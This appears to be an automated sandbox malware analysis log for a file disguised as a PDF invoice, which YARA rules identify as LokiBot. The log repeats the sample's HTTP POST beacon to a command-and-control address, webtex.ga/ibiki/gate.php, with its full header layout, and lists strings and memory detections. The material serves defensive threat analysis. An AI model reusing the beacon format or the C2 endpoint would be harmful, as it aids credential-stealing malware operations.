              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
              Source: unknownDNS traffic detected: queries for: webtex.ga
              Source: unknownHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 190Connection: close
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.500191687.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://webtex.ga/ibiki/gate.php
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/9
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnac8
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224342922.0000000005F71000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnpro
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$T
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3T
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/WTa
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-d
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/eT
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/JT
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225373707.0000000005F68000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/eT
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225166450.0000000005F63000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225636033.0000000005F6A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_0158C0F40_2_0158C0F4
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_0158E5380_2_0158E538
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_0158E5280_2_0158E528
